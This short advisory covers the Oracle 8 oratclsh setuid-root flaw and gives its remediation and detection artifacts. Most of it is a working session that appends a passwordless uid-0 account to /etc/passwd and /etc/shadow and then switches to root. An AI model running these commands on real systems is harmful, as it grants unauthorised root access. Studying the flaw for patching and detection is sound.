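Oracle 8 oratclsh SUID Vulnerability

The session below shows Tcl file operations issued inside oratclsh succeeding against /etc/passwd and /etc/shadow, which means the interpreter is running with root's effective privileges (evidently because the binary is installed setuid root). A general-purpose script interpreter should not carry the setuid bit: removing it from oratclsh, and auditing the Oracle installation for other setuid binaries, closes this path. The artifacts to look for are unexpected uid 0 entries in /etc/passwd and accounts in /etc/shadow with an empty password field.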

./oratclsh
% set f [open "/etc/passwd" "a+"]
% puts $f "intruder:x:0:1:intruder:/tmp/intruder:/bin/sh"
% close $f
% set f [open "/etc/shadow" "a+"]
% puts $f "intruder::::::::"
% close $f
% exit

$ su - intruder
$ id
uid=0(root) gid=1(other)


 
